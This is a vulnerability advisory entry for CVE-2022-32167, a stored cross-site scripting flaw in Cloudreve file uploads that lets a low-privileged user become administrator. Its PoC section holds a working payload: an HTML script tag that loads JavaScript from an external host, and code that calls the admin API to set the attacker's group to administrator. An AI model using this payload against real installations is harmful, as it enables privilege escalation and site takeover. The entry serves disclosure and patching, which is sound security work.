Headline

CVE-2022-32167: Mend Vulnerability Database

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), via the file upload functionality. A low privileged user will be able to share a file with an admin user, which could lead to privilege escalation.

2 years ago

CVE

Open in Source

#xss #vulnerability #js #java

CVE-2022-32167

Date: May 31, 2022

Overview

Details

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), when attacker upload the malicious HTML file consisting of malicious JavaScript code it’s been stored and when an admin user will preview the file it will execute the malicious code which will then run with admin privileges.

PoC Details

Access the application and create a low privileged user account from an admin user. Now, from the newly created user, upload the malicious HTML file consisting of malicious JavaScript code, as shown in the "POC Code". Create a preview share link and share it with the admin user. Once an admin user accesses the preview link, XSS will trigger and the low privileged user will then have an Administrator role.

PoC Code

XSS Payload Inside safe.html:

<script src=http://0.0.0.0:2222/lpeexploit.js></script>


JS Code Inside lpeexploit.js:

fetch("http://localhost:5212/api/v3/admin/user/2")
.then(response => response.text())
.then(data => {
var post = JSON.parse(data);
delete post.code;
delete post.msg;
post.user = post.data;
delete post.data;
var post2 = post.user;
post2['GroupID'] = 1;
var post_data = JSON.stringify(post);
fetch("http://localhost:5212/api/v3/admin/user",
{
headers: {
'Accept': 'application/json, text/plain, */*',
'Content-Type': 'application/json',
},
method: "POST",
body: post_data
});

});

Affected Environments

3.0.0-beta1–3.5.3

Language: Go

Good to know: